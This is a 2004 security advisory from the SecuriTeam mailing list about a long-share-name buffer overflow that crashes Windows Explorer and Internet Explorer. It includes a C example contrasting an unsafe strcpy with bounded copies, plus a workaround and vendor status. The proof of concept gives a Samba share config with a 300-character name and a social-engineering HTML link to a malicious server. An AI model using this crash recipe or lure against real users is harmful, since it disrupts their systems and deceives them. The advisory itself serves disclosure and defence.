[NT] Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 04/26/04
- Previous message: SecuriTeam: "[EXPL] Windows Lsasrv.dll RPC Buffer Overflow (MS04-011)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 26 Apr 2004 12:47:41 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow
------------------------------------------------------------------------
SUMMARY
MS Explorer (explorer.exe) and MS Internet Explorer (IEXPLORE.EXE) are core
components of the Microsoft Windows operating systems. An unchecked buffer
allows a malicious user to crash Microsoft Explorer by creating a shared
directory with a long name and convincing the user to access it.
DETAILS
Vulnerable Systems:
MS Internet Explorer and MS Explorer (explorer.exe) on the following platforms:
* Windows XP(All), Windows 2000(All), Windows 98(All), Windows ME(All)
* Windows 2003 not tested
In order to exploit this, an attacker must be able to get a user to
connect to a malicious server that offers a share whose name is 300
characters or longer.
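The defect class behind this advisory is a fixed-size buffer that receives an attacker-controlled share name without a length check. The following C program is an added illustration written for this page; it is not Microsoft's code, and the 64-byte buffer size, the function names and the UNC parser are assumptions made for the example. It places the unsafe copy beside a hardened version that measures the name within the buffer bound before copying, and a bounded parser that extracts the share component of a UNC path, so a client never trusts a server-supplied name to fit.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Capacity of the client's share-name buffer. This value is an assumption made
 * for the example; the advisory does not say how large the real buffer is. */
#define SHARE_NAME_MAX 64

/* Vulnerable pattern (illustration only): an attacker-controlled share name is
 * copied into a fixed-size buffer with no length check. Any name longer than
 * SHARE_NAME_MAX - 1 bytes writes past the end of 'dst', which is the defect
 * class the advisory describes. Never call this on untrusted input. */
void copy_share_name_unsafe(char dst[SHARE_NAME_MAX], const char *src)
{
    strcpy(dst, src); /* unbounded copy */
}

/* Hardened version: measure the name within the buffer bound first, reject it
 * if it is empty or does not fit (including its terminator), then copy exactly
 * the bytes measured. Returns 0 on success, -1 on rejection; on rejection 'dst'
 * is left as an empty string so a caller cannot use stale data by mistake. */
int copy_share_name_safe(char dst[SHARE_NAME_MAX], const char *src)
{
    size_t n = 0;
    while (n < SHARE_NAME_MAX && src[n] != '\0')
        n++;
    if (n == 0 || n == SHARE_NAME_MAX) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1); /* n bytes plus the terminator, both known to fit */
    return 0;
}

/* Extract the share component of a UNC path (\\server\share[\rest]) with the
 * same bound, rejecting malformed paths. Returns 0 on success, -1 otherwise. */
int parse_unc_share(const char *unc, char share[SHARE_NAME_MAX])
{
    share[0] = '\0';
    if (strncmp(unc, "\\\\", 2) != 0)
        return -1;
    const char *server = unc + 2;
    const char *sep = strchr(server, '\\');
    if (sep == NULL || sep == server) /* empty server name or no share part */
        return -1;
    const char *start = sep + 1;
    const char *end = strchr(start, '\\');
    size_t len = end ? (size_t)(end - start) : strlen(start);
    if (len == 0 || len >= SHARE_NAME_MAX)
        return -1;
    memcpy(share, start, len);
    share[len] = '\0';
    return 0;
}

/* Builds a constructed share name of 'len' 'A' characters, like the
 * advisory's "[A x 300]" share, runs it through the hardened copy and returns
 * that result (0 accepted, -1 rejected). */
int probe_share_name_length(size_t len)
{
    char buf[SHARE_NAME_MAX];
    char *name = malloc(len + 1);
    if (name == NULL)
        return -1;
    memset(name, 'A', len);
    name[len] = '\0';
    int rc = copy_share_name_safe(buf, name);
    free(name);
    return rc;
}

/* Returns the length of the share component parse_unc_share() extracts, or -1
 * if the path is rejected. */
int unc_share_length(const char *unc)
{
    char share[SHARE_NAME_MAX];
    if (parse_unc_share(unc, share) != 0)
        return -1;
    return (int)strlen(share);
}

int main(void)
{
    char share[SHARE_NAME_MAX];
    printf("10-char share name:  %s\n", probe_share_name_length(10) == 0 ? "accepted" : "rejected");
    printf("300-char share name: %s\n", probe_share_name_length(300) == 0 ? "accepted" : "rejected");
    /* Constructed UNC path using a documentation-range address. */
    if (parse_unc_share("\\\\192.0.2.10\\public\\docs", share) == 0)
        printf("share in UNC path:   %s\n", share);
    return 0;
}
```

The point of the hardened copy is that the bound is enforced before any byte is written: the loop never reads past SHARE_NAME_MAX, and a name that fills the whole buffer with no room for its terminator is rejected rather than silently truncated, which keeps the failure visible to the caller.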
Proof of Concept:
Windows will not allow you to create such a long share name, but of course
Samba does. Once your Samba box is up and running, create a share in your
smb.conf whose name is 300 'A' characters long:
[A x 300]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung
After your server is up, just go to your Windows test box and open
Start menu > Run > \\your.malicious.server.ip.
Plufff, explorer will crash.
Or by social engineering:
<a href="\\my.malicious.server.ip">Enter My 0day sploit archive
l/p:n0ph33r</a>
Workaround:
In your network card settings, disable the Client for Microsoft Networks
until an official fix for this vulnerability is available.
Vendor Status:
Rodrigo Gutierrez notified the vendor at the beginning of 2002. According to
the vendor's Knowledge Base article 322857
<http://support.microsoft.com/default.aspx?scid=kb;en-us;322857>, this
vulnerability was supposed to be fixed in Windows XP Service Pack 1 and
Windows 2000 SP4.
ADDITIONAL INFORMATION
The information has been provided by <mailto:rodrigo@intellicomp.cl>
Rodrigo Gutierrez.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.